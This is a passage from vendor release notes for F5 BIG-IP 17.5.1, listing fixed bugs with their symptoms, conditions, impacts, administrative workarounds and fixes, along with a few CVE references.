Under certain conditions SCP does not follow current best practices.

Conditions:
- Authenticated high-privilege user
- SCP file transfer

Impact:
BIG-IP does not follow best practices for scp operations

Workaround:
N/A

Fix:
The SCP file transfer in BIG-IP now follows current best practices.

Fixed Versions:
17.5.1


1922501-1 : TMM crash loop due to missing kernel driver

Links to More Info: BT1922501

Component: TMOS

Symptoms:
TMM goes into a crash loop with following logs in 'tmm' logs

notice EAL: Driver cannot attach the device (<VMBus-ID>)
notice EAL: Failed to attach device on primary process
notice dpdk[<VMBus-ID>]: Error: rte_dev_probe failed: err=-95
notice xnet_lib [vmbus:eth2]: Error: Failed to initialize driver
notice xnet[00:e2.0]: Error: Unable to attach to xnet dev


This is due to missing uio_hv_generic kernel module which gets removed on TMM shutdown but fails to be re-inserted upon TMM post-crash restart.

Conditions:
1) BIG-IP on HyperV or Azure
2) Using xnet-DPDK driver
3) TMM crashes due to any other reason and restarts; can not repro directly using 'bigstart restart tmm' unless a 'bigstart restart' also reproduces the initial crash as well

Impact:
Traffic disrupted while tmm restarts.

Workaround:
(A)
1) Add 'modprobe uio_hv_generic' to '/usr/lib/bigstart/functions'
This will likely require remounting /usr to allow writing; this can be done via
  sudo mount -o remount,rw /usr

2) Within 'functions', search for 'vadc_restore_vmbus_nics()' and add 'modprobe uio_hv_generic' to bottom of function after 'done'

3) Afterwards, restart TMM with 'bigstart restart tmm'

(B)
1) Switch to 'sock' driver by adding following config

[root@BIGIP:Active:Standalone] config # cat /config/tmm_init.tcl
device driver vendor_dev f5f5:f550 sock

[root@BIGIP:Active:Standalone] config #

2) Restart TMM with 'bigstart restart tmm'

Fix:
Re-activate missing module after TMM crash

Fixed Versions:
17.5.1


1920341-1 : SSH Public Key authentication allows RSA and not ECDSA in ccmode

Links to More Info: BT1920341

Component: TMOS

Symptoms:
When a device is in common criteria mode, you cannot use ecdsa-sha2-nistp256 or ecdsa-sha2-nistp384 for SSH public key authentication. Additionally, you can use rsa key which you should not be able to according to common criteria guidelines.

Conditions:
-- Common Criteria mode is enabled

Impact:
You cannot ssh with ECDSA but can with RSA key

Workaround:
Workaround is in file /config/ssh/sshd_config, on line 34 replace:
HostKey /config/ssh/ssh_host_rsa_key

with:
HostKey /config/ssh/ssh_host_ecdsa_key
HostKey /config/ssh/ssh_host_ecdsa_p384_key

Note that this workaround must be applied after each reboot in ccmode, since the sshd_config file will revert after reboot.

Fix:
SSH public key authentication works as expected in ccmode.

Fixed Versions:
17.5.1


1920057-1 : Bd crashes

Component: Application Security Manager

Symptoms:
Bd crashes

Conditions:
Running TMOS version of 17.5.0.

Impact:
Traffic disrupted while bd restarts.

Workaround:
None

Fix:
The crash no longer occurs.

Fixed Versions:
17.5.1


1917741-2 : [APM][TMM] memory growth in SAML SP while decoding assertion attributes

Links to More Info: BT1917741

Component: Access Policy Manager

Symptoms:
Tmm crashes due to out of memory while passing SAML traffic

Conditions:
-- SAML SP configured with assertion attributes.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None

Fixed Versions:
17.5.1


1881373-2 : CVE-2024-3661 Tunnelvision Vulnerability

Links to More Info: K000139553, BT1881373


1880365-1 : Cannot log into Fs_v2 Azure BIG-IP with >= 32 vCPUs and >= 5 interfaces

Links to More Info: BT1880365

Component: TMOS

Symptoms:
No login prompt is available to access Azure Fs_v2 instances when attaching 5 or more instances. 8 is the max number of interfaces for F32_v2 or larger.

Conditions:
-- Use Azure F32_v2 instance size or larger.
-- Attach 5 or more interfaces to BIG-IP.

Impact:
No access to F32_v2 instances or larger when attaching 5 or more interfaces.

Workaround:
None

Fix:
Login prompt is available.

Fixed Versions:
17.5.1


1857413-2 : Malformed XML data or Malformed JSON data violation raised despite URL containing content-profile

Links to More Info: BT1857413

Component: Application Security Manager

Symptoms:
* XML/JSON traffic gets flagged or blocked with a Malformed XML data or Malformed JSON data violation despite the URL having a content-profile associated with it.

* When the violation gets raised, the violation details lists the profile as "N/A".

* The XML/JSON content profiles are visible when viewing the content profile configuration via WebUI. However, corresponding database tables lose integrity, which results false positive.

Conditions:
Any change followed by 'Apply Policy' on a policy can ruin the integrity of corresponding database that might affect other policies, and false positive would start after subsequent 'Apply Policy' or global configuration update.

Impact:
XML/JSON traffic gets flagged or, if enforced, blocked despite the content profile associated to the URL.

Workaround:
Make a spurious policy change to the affected XML or JSON profile (e.g., updating its Description), followed by applying policy changes via 'Apply Policy,'

This helps resolve the issue by populating a new entry in the database table for this policy.

Avoid making any change on any GraphQL profile to prevent it from re-occurring.

Fix:
Configuration change will not ruin the integrity of the database tables.

Fixed Versions:
17.5.1


1856449-1 : [keymgmtd]OpenSSL: DRBG Continuous RNG test failed: DRBG stuck.

Links to More Info: BT1856449

Component: TMOS

Symptoms:
You may observe below logs in /var/log/ltm

err keymgmtd[31381]: OpenSSL: DRBG Continuous RNG test failed: DRBG stuck.
err fips_monitor[18007]: 01da0011:3: SelfTest/Integrity test failure detected, triggering reboot action

Conditions:
Conditions are unknown

Impact:
Unexpected reboot causing disruption to traffic and failover.

Workaround:
None

Fixed Versions:
17.5.1.2


1856289-2 : Virtual server, which is managed by remote LTM device, is shown as "offline/enabled" with "Monitor /Common/bigip : no reply from big3d: timed out" message (red diamond icon).

Links to More Info: BT1856289

Component: Global Traffic Manager (DNS)

Symptoms:
When a virtual server object, which is managed by a remote LTM device, is disabled, after gtmd is restarted (or GTM/DNS device reboot) and gtmd becomes online and iQuery communication is re-established with the remote LTM device, the bellow message is logged to /var/log/gtm and virtual server status becomes "offline/disabled" (black diamond icon).

gtmd[xxxx]: 011ae0f2:1: Monitor instance /Common/bigip 10.1.1.201:80 CHECKING --> DOWN from /Common/bigipdns (no reply from big3d: timed out)
gtmd[xxxx]: 011a6006:1: SNMP_TRAP: virtual server /Common/vs1 (ip:port=10.1.1.201:80) (Server /Common/bigipltm) state change blue --> red ( Monitor /Common/bigip : no reply from big3d: timed out: disabled directly)

Then, even after re-enabling the virtual server, which is managed by LTM, virtual server stays as "offline/enabled" (red diamond icon) with "Monitor /Common/bigip : no reply from big3d: timed out" message.

  ----------------------------------
  | Gtm::Virtual Server: vs1
  ----------------------------------
  | Status
  | Availability : offline
  | State : enabled
  | Reason : Monitor /Common/bigip : no reply from big3d: timed out
  | Destination : 10.1.1.201:80
  | Up Time : ---

Conditions:
All of the following conditions met.

- GTM/DNS device manages remote LTM device and its virtual server.
- Remote LTM virtual server is not directly monitored by GTM/DNS device monitor object. Instead, remote LTM virtual server is monitored by remote LTM device itself (e.g., on remote LTM device, virtual server pool is monitored by pool monitor).
- On GTM/DNS device, disable and re-enable virtual server, which is managed by remote LTM device.
- After virtual server is disabled on GTM/DNS device, gtmd restart on GTM/DNS device or GTM/DNS device reboots.
- GTM/DNS is running on a software versions 17.1.1 or 16.1.5 or later versions in which the ID 1133201 is fixed.

Impact:
Virtual server stays as unavailable despite the remote LTM device reporting virtual server status as 'up'. Hence, pool or wideIP, which uses the affected server object, may be unavailable too.

Workaround:
If issue had already occurred and virtual server stayed as "offline/enabled" (red diamond icon), restarting gtmd on GTM/DNS device will rescue the affected virtual server.

If issue does not yet occur but virtual server is going to be disabled and re-enabled, you can prevent issue by changing "DNS >> Settings : GSLB : General - Monitor Disabled Objects" setting (gtm global-settings general monitor-disabled-objects) to "yes" (default "no"). This needs to be done prior to disabling virtual server (prior to gtmd restart/reboot).

# tmsh modify gtm global-settings general monitor-disabled-objects yes
# tmsh save sys config gtm-only

Fixed Versions:
17.5.1


1853721-3 : User has reached maximum active login tokens

Links to More Info: BT1853721

Component: TMOS

Symptoms:
You are unable to create any new tokens for a user.

Conditions:
To reproduce the issue, create 100 active tokens for non admin user and reboot device

-- 100 active tokens already exist for a non-admin user
-- The system is rebooted

Impact:
You are unable to create any new tokens for the user.

An error is reported: "User has reached maximum active login tokens"

Workaround:
Execute below command
 restcurl -X DELETE /shared/authz/tokens

Fixed Versions:
17.5.1.2


1826393-4 : TMM may restart when handling undisclosed traffic handled by IPS

Component: Traffic Classification Engine

Symptoms:
tmm crashes and restarts due to memory pressure

Conditions:
IPS configured on virtual.

Impact:
TMM restarts - traffic interruption.

Workaround:
N/A

Fix:
The undisclosed traffic scenario no longer causes TMM to restart.

Fixed Versions:
17.5.1


1826185-2 : Tenants on r2000 and r4000 series may drop packets larger than 9194 bytes

Links to More Info: BT1826185

Component: Local Traffic Manager

Symptoms:
F5OS tenants have a supported maximum MTU of 9198 bytes as per K6399. Tenants running on 2000 and r4000 series may drop packets larger than 9194 bytes.

The tmm/xnet/iavf/per_vf_stats.rx_discards stat increments when this occurrs.

Conditions:
R2000 or r4000 platform.
Jumbo frames

Impact:
Dropped jumbo frames

Workaround:
Lower the MTU such that packets are not exceeding 9194 bytes.

Fixed Versions:
17.5.1.2


1826013-1 : BIG-IP as Oauth C/RS "Invalid json error" after upgrade to 17.1.2.1 when json response has non ASCII characters

Links to More Info: K000150397, BT1826013

Component: Access Policy Manager

Symptoms:
OAuth authentication fails with error error: Invalid json on oauth client/RS

Conditions:
OAuth client/RS receives JWT token which contains non-ASCII characters

Impact:
OAuth authentication fails

Workaround:
None

Fix:
17.1.2.1 code has libjson:isvalid() to check if the json is valid or not. this function cannot validate non ASCII characters and returns error. removed this function and added logic to check if valid json is received or not.

Fixed Versions:
17.5.1.2


1825949-2 : [APM][Radius] Message-Authenticator value is incorrect for OTP request

Links to More Info: BT1825949

Component: Access Policy Manager

Symptoms:
When a OTP challenge is requested on RSA, the Message-Authenticator value in the second request is not corrected/alarmed by the RSA server.

Eventually the packet is dropped at the Radius Server.

Conditions:
The Message-Authenticator attribute radius.messageauthenticator is set to true.

Impact:
This causes authentication failures, disrupting the user’s access control process.

Workaround:
None

Fixed Versions:
17.5.1


1825513 : ClientSSL profile with PQC group may cause TMM to crash

Links to More Info: BT1825513

Component: Local Traffic Manager

Symptoms:
TMM or system services may restart unexpectedly due to memory pressure.

In /var/log/tmm:

warning tmm[24255]: 01260013:4: SSL Handshake failed for TCP 10.20.2.115:44404 -> 10.20.40.191:443
err tmm[24255]: 01230140:3: RST sent from 10.20.40.191:443 to 10.20.2.115:44404, [0x3076761:2571] SSL handshake timeout exceeded
err tmm3[24255]: 01010282:3: Crypto codec error: sw_crypto-3 RSA private encrypt error OpenSSL error:03078069:bignum routines:BN_EXPAND_INTERNAL:expand on static bignum data
err tmm2[24255]: 01010282:3: Per-invocation log rate exceeded; throttling.
 err tmm6[24255]: 01010282:3: Resuming log processing at this invocation; held 53 messages.

Conditions:
Cipher rule DH group X25519KYBER768 is enabled.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
There is no workaround, disable X25519KYBER768 to mitigate the issue.

Fix:
Fix memory issues.

Fixed Versions:
17.5.1


1825449-2 : Citrix Optimal Gateway Routing is not showing login username of session

Links to More Info: BT1825449

Component: Access Policy Manager

Symptoms:
When an iRule-based solution for optimal gateway routing is used for Citrix VDI, the currently logged-in username will not be displayed on the GUI session details page.

Conditions:
- APM Citrix VDI OGR is implemented with an iRule workaround.
- When the user checks the last logged-in username in the GUI.

Impact:
Username column displays empty instead of username.

Workaround:
None

Fix:
The Username column should display the name of the user currently logged in for the session.

Fixed Versions:
17.5.1


1825241-4 : MCPD validation fails when non-existent cipher group is referenced by SSL profile

Links to More Info: BT1825241

Component: Local Traffic Manager

Symptoms:
When using "tmsh load sys config verify" or performing an MCPD forceload/reboot, no validation error is reported for a SSL profile referencing a non-existent cipher group. This is unexpected behavior.

However, when using "tmsh load sys config", the system correctly identifies and reports the missing cipher group as a validation error. This is the expected behavior.

Conditions:
The disk config file (/config/bigip.conf) is missing the cipher group configuration, while that cipher group continues to be referenced within a SSL profile.

Impact:
When a SSL profile references a non-existent cipher group, the configuration loads without validation errors under certain conditions. This can result in connection failures with error messages such as:

     Connection error: hud_ssl_handler:1315: alert(40) invalid profile unknown on VIP <VIP_NAME>

Workaround:
Ensure the disk config file (/config/bigip.conf) always has the cipher group present if it is being referenced by a Client or Server SSL profile.

Fixed Versions:
17.5.1


1821373-2 : SAML Assertion Handling issue in APM SSO

Links to More Info: BT1821373

Component: Access Policy Manager

Symptoms:
When attributes with large encrypted values are present, the allocated memory may not be appropriately resized, leading to unexpected behavior.

Conditions:
This occurs specifically under configurations that utilize SAML with encrypted attributes containing large values.

Impact:
TMM core, partial traffic disruption

Workaround:
NA

Fix:
SAML Assertion Handling issue in APM SSO has been addressed.

Fixed Versions:
17.5.1


1821033-2 : Assertion "packet must already have an ethernet header" when using tcpdump

Links to More Info: BT1821033

Component: Local Traffic Manager

Symptoms:
Tmm crashes when running tcpdump.

Conditions:
1. A virtual server references another virtual server with an iRule
2. The destination virtual server has an iRule with reject inside FLOW_INIT
3. Use tcpdump while hitting the reject rule

Impact:
Traffic disrupted while tmm restarts.

Workaround:
Use either remote tcpdump or avoid using reject rule in FLOW_INIT.

Fix:
Tmm no longer crashes in this scenario.

Fixed Versions:
17.5.1


1819813-2 : [APM][NTLM]TMM core on null _ntlm_msg on 17.1.x on top of ID1495381

Links to More Info: BT1819813

Component: Access Policy Manager

Symptoms:
Tmm cores while APM looks up a session.

Conditions:
SWG explicit forward proxy or PRP with NTLM or Kerberos or LDAP credentials identification method.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None

Fixed Versions:
17.5.1.2


1819777-4 : In-tmm TCP monitor with no RCV and RCVdisable string might lead to a crash

Links to More Info: BT1819777

Component: In-tmm monitors

Symptoms:
In-tmm TCP monitor with no RCV and RCVdisable string might lead to a crash.

Conditions:
This happens when TCP in-tmm monitor is configured without any matching disable/enable string

ltm monitor tcp TCP {
    adaptive disabled
    defaults-from tcp
    interval 5
    ip-dscp 0
    recv none <<<< !
    recv-disable none <<<< !
    send "GET /check HTTP/1.0\r\n\r\n"
    time-until-up 0
    timeout 16
}

Bigd monitoring is not affected.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
- Disable in-tmm monitoring.
- OR, configure in-tmm TCP monitor with any string match.

Fixed Versions:
17.5.1


1818461-2 : [APM][VPN][WIN] Tunnel can't be established if endpoint inspection is Skipped. Machine Hash is not maching

Links to More Info: BT1818461

Component: Access Policy Manager

Symptoms:
Because of selecting Skip Inspection button during EPI launch, it leads to in-correct machine hash and VPN connection is failed with below errors.

err tmm1[18549]: 01230140:3: RST sent from 10.103.xx.xx:443 to 10.103.xx.xx:64086, [0x2ff9084:34740] Machine Hash is not Valid

tmm1[18549]: 01230140:3: RST sent from 10.103.xx.xx:443 to 10.103.xx.xx:64123, [0x2ff9084:4239] Access encountered an error (Operation not supported)

Conditions:
-- Endpoint inspection is enabled in access policy, add Advanced resources assignment for fallback branch and end with allow
-- Launch endpoint inspection, select Skip Inspection instead of Start Inspection

If you are upgrading, this can be encountered after upgrading to version 17.1.2 and APM client (7250 or 7251).

Impact:
TCP connection reset is encountered and VPN connection fails.

Workaround:
Instead of Skip Inspection, select Start Inspection

(Or)
Don't configure any EPI check in Access policy

Fixed Versions:
17.5.1


1814821-3 : DHE groups present in profile's cipherlist with TLS1.3 enabled and tmm.ssl.useffdhe set to false simultaneously

Links to More Info: BT1814821

Component: Local Traffic Manager

Symptoms:
You might observe CRIT-level logs of configuration issues in the TMM logs but there is no impact to the traffic. Example log message:

crit tmm4[17746]: 01260000:2: Profile /Common/serverssl-secure: DHE groups present in profile's cipherlist with TLS1.3 enabled and tmm.ssl.useffdhe set to false simultaneously.

Conditions:
1. The db variable tmm.ssl.useffdhe set to false
2. Virtual server configured to use DH groups

Impact:
Crit-level logs are logged to /var/log/tmm

Workaround:
Leave the tmm.ssl.useffdhe value to default which is true

Fixed Versions:
17.5.1


1814477-1 : AWS Performance Drop from BIG-IP v17.1.2.1 to v17.5.0

Links to More Info: BT1814477

Component: Performance

Symptoms:
A FastL4 throughput drop occurs when updating to BIG-IP version 17.5.0.

Conditions:
-- Using AWS BIG-IP v17.5.0

Impact:
Throughput is lower compared to v17.1.2.1.

Workaround:
None

Fix:
Performance is improved in v17.5.0 compared to v17.1.2.1.

Fixed Versions:
17.5.1


1813841-1 : Password Caching setting is not applied

Links to More Info: BT1813841

Component: Access Policy Manager

Symptoms:
In the Connectivity profile, "F5 Access for Mac OS" is removed and updated on "Desktop Client Settings".

The Allow password caching functionality which was used to work with "F5 Access for Mac OS" is not working after updating the UI to "Desktop Client Settings".

Conditions:
Allow Password Caching is enabled on BIG-IP UI for Mac F5 Access.

Impact:
Users will be prompted to password page even after Allow Password caching is enabled.

Workaround:
Enable the Allow password caching via TMSH:
 
For Memory Option to Enable on Allow Password Caching:
 
modify apm profile connectivity Connectivity_profile client-policy modify { Connectivity_profile_clientPolicy { macos-ec { save-password true save-password-method memory save-password-timeout 10 } } }
 
 
For Disk option to Enable on Allow Password Caching:

modify apm profile connectivity Connectivity_profile client-policy modify { Connectivity_profile_clientPolicy { macos-ec { save-password true save-password-method disk } } }

Fixed Versions:
17.5.1


1813209-1 : Password Cache Expiration field is hidden in Connectivity profile

Links to More Info: BT1813209

Component: Access Policy Manager

Symptoms:
Password Cache Expiration field is hidden in Connectivity profile under Desktop Client Settings

Conditions:
1. Access-> Connectivity/VPN -> Profiles ->add/edit
2. Desktop Client Settings -> enable "Allow Password Caching"
3. Select "memory" as the "Save Password Method"

Impact:
For Creating new Connectivity profile:
You will not be able to set Password Cache Expiration value and default value of 240 will be used

For Existing Connectivity Profile:
You will not be able to modify the Password Cache Expiration value (Existing value).
In case of upgrades the existing value will be used

Workaround:
To modify the Password Cache Expiration value run:

tmsh modify apm profile connectivity <profile_name> client-policy modify { <profile_name>_clientPolicy { ec { save-password-timeout <desired value> } } }

Fixed Versions:
17.5.1


1812201-4 : A specific unicode character issue a malformed json violation

Links to More Info: BT1812201

Component: Application Security Manager

Symptoms:
When JSON arrives with a specific character, a malformed json violation is issued.

Conditions:
A specific character arrives in a JSON payload

Impact:
A blocking violation occurs.

Workaround:
None

Fixed Versions:
17.5.1


1798961-2 : With CC/FIPS license installed, OpenSSL should raise fatal alert when client does not advertise EMS support

Links to More Info: BT1798961

Component: TMOS

Symptoms:
When FIPS license is installed, OpenSSL enforces Extended Master Secret (EMS) to its peer clients. If a legacy TLS/SSL client does not provide EMS in its ClientHello extension, OpenSSL server merely aborts the handshake without sending a Fatal Handshake Alert message to the client. As a result, the reason for handshake abort is not clear.

Conditions:
1. FIPS license is installed on the BIG-IP Device
2. HTTPD server running on the BIG-IP device is linked with libssl.{so, a}
3. An attempt is made to contact the WebUI from a legacy browser that did not have support for EMS (or alternatively, from a service that did not advertise EMS support)

Impact:
Absence of explicit log message results in some confusion as to what the error was when the handshake terminated.

Workaround:
None

Fix:
A log message indicating a Fatal Handshake Message alert will be added. Then, whenever a legacy TLS/SSL client failed to provide the Extended Master Secret in its ClientHello message to the BIG-IP device with FIPS license installed, an error will be logged as the handshake aborts. This will inform the user the reason for the handshake termination.

Fixed Versions:
17.5.1


1798601-4 : BD restart loop after upgrade on error in CONFIG_TYPE_ACCOUNT_CHARSET_TEMPLATES

Links to More Info: BT1798601

Component: Application Security Manager

Symptoms:
After upgrade, bd goes into a restart loop. An error is logged to /var/log/bd.log:

ECARD_POLICY|NOTICE|Feb 01 21:35:01.061|21460|table_funcs.cpp:1471|handle_table_dynamic CONFIG_TYPE_INTERNAL_PARAMETERS res:[0]
ECARD_POLICY|NOTICE|Feb 01 21:35:01.061|21460|table_funcs.cpp:1471|handle_table_dynamic CONFIG_TYPE_ENFORCER_ACCOUNTS res:[0]
ECARD_POLICY|NOTICE|Feb 01 21:35:01.063|21460|table_funcs.cpp:1471|handle_table_dynamic CONFIG_TYPE_LANGUAGE_CHARSET res:[0]
ECARD_POLICY|NOTICE|Feb 01 21:35:01.067|21460|table_funcs.cpp:1471|handle_table_dynamic CONFIG_TYPE_ACCOUNT_CHARSET_TEMPLATES res:[0]
BD_MISC|ERR |Feb 01 21:35:01.070|21460|temp_func.c:2296|CONFIG_TYPE_PROTOBUF_FILENAMES message had parsing error: could not parse protobuf message

Conditions:
There is a licensing change on a device, and there is a policy that does not have any JSON profiles that have metacharElementCheck enabled.

Impact:
BD restarts in a loop. Traffic disrupted while bd restarts.

Workaround:
Run the following SQL on an affected system(s).

UPDATE DCC.ACCOUNT_CHARSET_TEMPLATES AS target JOIN (SELECT policy_name_crc, charset FROM DCC.ACCOUNT_CHARSET_TEMPLATES WHERE charset_templ_id = 2) AS source ON (target.policy_name_crc = source.policy_name_crc AND target.charset = '') SET target.charset = source.charset;

Fixed Versions:
17.5.1.2


1796609-3 : [APM][VDI]TCL error when upgrading to 17.x: can't read "tmm_apm_feed_login": no such variable

Links to More Info: BT1796609

Component: Access Policy Manager

Symptoms:
After upgrading from BIG-IP version 15 to version 17 you may get a RST due to the below TCL error when requesting some application URLs:

TCL error: /Common/_sys_APM_VDI_Helper <HTTP_RESPONSE_RELEASE> - can't read "tmm_apm_feed_login": no such variable while executing "if { ($tmm_apm_client_type == "rdg-http" || $tmm_apm_feed_login) && $tmm_apm_is_nego_auth } { # Getting response header fo..."

Conditions:
-- VDI profile is attached
-- iRules are attached with custom priorities

Impact:
TCL errors observed in the LTM logs leading to connection reset

Workaround:
None

Fixed Versions:
17.5.1, 16.1.6


1789529-3 : A crash of the bd daemon

Links to More Info: BT1789529

Component: Application Security Manager

Symptoms:
A crash happens on specific xml payloads

Conditions:
Very specific circumstances related to specific policy and traffic.

Impact:
Traffic disrupted while bd restarts.

Workaround:
None

Fix:
A crash related to the XML parser was fixed.

Fixed Versions:
17.5.1


1789501-3 : [APM][Standard Customisation]Webtop is blank after upgrading APM version 17.1.2 with Edge Browser in Compatibility mode.

Links to More Info: BT1789501

Component: Access Policy Manager

Symptoms:
The Webtop is blank, does not display any resources.

Conditions:
The issue occurs when all of the following conditions are met.

-Using Microsoft Edge browser in compatibility mode (IE mode)
-Access Profile is using standard customisation
-BIG-IP Version 17.1.2 or later, 16.1.5 or later (version with fix of ID504374)

Impact:
Unable to use legacy applications in Microsoft Edge's IE compatibility mode

Workaround:
Use modern customization for access profile.

Fixed Versions:
17.5.1


1789477-4 : Orphaned tmsh processes might eventually lead to an out-of-memory condition

Links to More Info: BT1789477

Component: TMOS

Symptoms:
Occasionally, tmsh processes are orphaned when a user connects to the BIG-IP system via SSH, runs commands, and then quits the session or disconnects.

An orphaned tmsh process will have a parent pid (PPID) of 1. You can check for orphaned tmsh processes using the following shell command:

/bin/ps -o pid,ppid,comm -C tmsh
PID PPID COMMAND
8255 1 tmsh

If this issue occurs often enough, it might cause the BIG-IP system to run out of memory.

Conditions:
-- Using tmsh to connect to the BIG-IP system via SSH.
-- Running commands.
-- Quitting the session or disconnecting.

Impact:
Orphaned tmsh processes are created, which might eventually lead to an out-of-memory condition, if it occurs often enough.

Workaround:
There are several workarounds for this issue:

-- Change the default shell to bash for users that are going to use the script.
-- Use iControl.
-- Kill orphaned tmsh processes.

Fix:
Tmsh processes are no longer orphaned when a user connects to the BIG-IP system via SSH, runs commands, and then quits the session or disconnects under these conditions.

Fixed Versions:
17.5.1


1787621-2 : TMM may unexpectedly restart during IPsec tunnel negotiation

Links to More Info: BT1787621

Component: TMOS

Symptoms:
Tmm crashes while handling IPSec traffic

Conditions:
-- IPsec IKEv2 tunnel configured and in use
-- The IPsec attempts to establish a tunnel with the remote peer

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None

Fix:
The TMM restart will not occur.

Fixed Versions:
17.5.1.2


1787153-2 : CVE-2019-9740 python: CRLF injection via the query part of the url passed to urlopen()

Links to More Info: BT1787153


1787149-2 : CVE-2019-18348 python: CRLF injection via the host part of the url passed to urlopen()

Links to More Info: K000153042


1786325-3 : Nxdomain stop blocking & nxdomain added into the allow list on rSeries

Links to More Info: BT1786325

Component: Advanced Firewall Manager

Symptoms:
Nxdomain domain eg:nxdomain.example.com is added into allow list. This causes tmctl nxdomain vector stats to not be accounted for, even when the client receives a response as nxdomain.

Conditions:
-- An nxdomain DoS vector is triggered
-- The nxdomain is later added to the allow list

Impact:
Tmctl stats for nxdomain vector is not accurate.

Workaround:
None

Fixed Versions:
17.5.1.2


1783217-1 : Rare bd crash

Links to More Info: BT1783217

Component: Application Security Manager

Symptoms:
A rare bd crash on some conditions related to json parsing

Conditions:
-- ASM provisioned, passing traffic
-- JSON parsing occurs

Impact:
ASM traffic disrupted while bd restarts.

Workaround:
None

Fixed Versions:
17.5.1.2


1783081-3 : Removing conditional freeing for m_oauth instances in tmm

Links to More Info: BT1783081

Component: Access Policy Manager

Symptoms:
Increase in TMM memory with M_OAUTH instances

Conditions:
M_OAUTH instances are freed based on conditional checks.

Impact:
Memory leak in TMM.

Workaround:
None

Fix:
Remove conditional freeing.

Fixed Versions:
17.5.1


1782365-3 : Importing a policy creates default 'password' sensitive parameter when it is not present in the exported policy in full JSON format

Links to More Info: BT1782365

Component: Application Security Manager

Symptoms:
Importing a policy creates a default 'password' sensitive parameter when it is not present in the exported policy in full JSON mode

Conditions:
-- Create a policy with API security template.
-- Delete the default "password" sensitive parameter.
-- Export the policy in full JSON format.
-- Import the policy again.

Impact:
Unexpected sensitive parameter appears in imported policy

Workaround:
None

Fix:
The policy is imported without sensitive parameters that do not appear in the full JSON policy

Fixed Versions:
17.5.1


1782113-3 : Parameter 'redirectwebauthn:i:0' is crashing the RDP file with 'The RDP File is corrupted' error message

Links to More Info: BT1782113

Component: Access Policy Manager

Symptoms:
Currently, with the below Custom Parameters
redirectclipboard:i:0
redirectprinters:i:0
redirectsmartcards:i:0
redirectwebauthn:i:0

The issue is when adding 'redirectwebauthn:i:0' to RDP Custom Parameters, the user gets RDP connection error when the user opens the downloaded RDP file. The ‘The RDP File is corrupted. The remote connection cannot be started’ message is displayed.

Conditions:
The parameter 'redirectwebauthn:i:0' is added to RDP Custom Parameters.

Impact:
Displays the below error message while opening the RDP file:
‘The RDP File is corrupted. The remote connection cannot be started’

Workaround:
Launch the RDP without the "redirectwebauthn:i:0" parameter.

Fixed Versions:
17.5.1


1773161-2 : BIG-IP APM 17.1.2 VPN tunnels failed to establish at "GET /isession" stage

Links to More Info: BT1773161

Component: Access Policy Manager

Symptoms:
Windows Edgeclient (any other client) stuck at Initialisation.

You may observe a lot of below logs in f5tunnelserver.txt

2024-12-15,12:32:26:530, 19084,19088,, 48, , 970, CUTunnelServerX::isReady(), server response , result=0

2024-12-15,12:32:27:035, 19084,19088,, 48, , 970, CUTunnelServerX::isReady(), server response , result=0

2024-12-15,12:32:27:541, 19084,19088,, 48, , 970, CUTunnelServerX::isReady(), server response , result=0

2024-12-15,12:32:28:046, 19084,19088,, 48, , 970, CUTunnelServerX::isReady(), server response , result=0

Conditions:
-- BIG-IP version with fix of ID 903501
-- "sys db ipv6.enabled" is set to FALSE
-- Any client attempting to establish a VPN tunnel

Impact:
VPN fails to establish

Workaround:
1. "sys db ipv6.enabled" is set to TRUE

OR

2. Perform below two operations

a) Disable the DB variable isession.ctrl.apm:

 tmsh modify sys db isession.ctrl.apm value disable
 
b) Perform 'Apply Access Policy' for the access policy attached to the virtual server.

Fixed Versions:
17.5.1


1772377-3 : Libtiff CVE-2024-7006: NULL pointer dereference in tif_dirinfo.c

Links to More Info: K000152542


1771985-3 : [APM] OAuth AS max claims data support upto 8kb dynamically

Links to More Info: BT1771985

Component: Access Policy Manager

Symptoms:
The max claim data size is set to 8kb by default.

Conditions:
Oauth AS configured with multiple claims.

Impact:
The large claim size can lead to excessive memory consumption.

Workaround:
None

Fix:
Allocate the right amount of memory dynamically as required based on claims configuration

Fixed Versions:
17.5.1


1771945-2 : Memory leak when using event-wait with SSL SANs

Links to More Info: BT1771945

Component: Access Policy Manager

Symptoms:
- Memory usage continues to grow despite load.
- TMM Crash / HA Failover.

Conditions:
- Access policy with event-wait
- Rule contains [ACCESS::perflow get perflow.ssl.server_cert.subject_alt_name]

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None

Fixed Versions:
17.5.1.2


1758181-2 : Optimal gateway routing issue with HTML5 client

Links to More Info: BT1758181

Component: Access Policy Manager

Symptoms:
When you configure APM VDI Citrix OGR using article https://community.f5.com/kb/technicalarticles/solution-for-citrix-optimal-gateway-routing/278727, the system fails to start ica connection to the backend desktop using HTML5 access.
Additionally, the iRule example is incorrect.

Conditions:
1. OGR is configured using https://community.f5.com/kb/technicalarticles/solution-for-citrix-optimal-gateway-routing/278727
2. Use HTML5 client access

Impact:
Could not connect to backend desktop using HTML5.

Workaround:
None

Fix:
It should connect to backend desktop using HTML5 along with native client.

Fixed Versions:
17.5.1


1758153-5 : Configuring a Data Guard URL longer than 1024 characters triggers a restart loop

Component: Application Security Manager

Symptoms:
Data Guard URLs are expected to be shorter than 1024 characters. If you configure a longer Data Guard URL, the configuration will cause the enforcer to crash and cause a restart loop.

Conditions:
A Data Guard URL longer than 1024 characters is configured and the policy is applied.

Impact:
The enforcer crashes and causes a restart loop.

Workaround:
Wildcards (*) should be utilized for any URL that is exceedingly long.

Fixed Versions:
17.5.1


1756825-4 : IPS Signatures not inspected being sometime after reboot

Component: Protocol Inspection

Symptoms:
After sudden or normal reboot, ipsd takes own time to bring respective ips profiles to Ready state. during this time traffic is not inspected for the signature traffic and passes through.

Conditions:
A high number of signatures across multiple or duplicated inspection profiles leads to significant delays in enforcement after a reboot.

Impact:
Traffic is not inspected for the signature after reboot before enforcing and actually passes through.

Fix:
After the fix, IPS Profiles will take less time to reach the ready state, even if the tmm or mcpd is restarted.

Fixed Versions:
17.5.1.2


1756525-2 : ixlv driver could have failed hardware offload with TSO off

Links to More Info: BT1756525

Component: Local Traffic Manager

Symptoms:
IPv4 packets for TLS alerts contain empty IP checksums.

Conditions:
-- The ixlv driver is used by tmm
-- TSO is disabled

Impact:
Empty checksums will cause TLS clients to reject TLS alert messages.

Workaround:
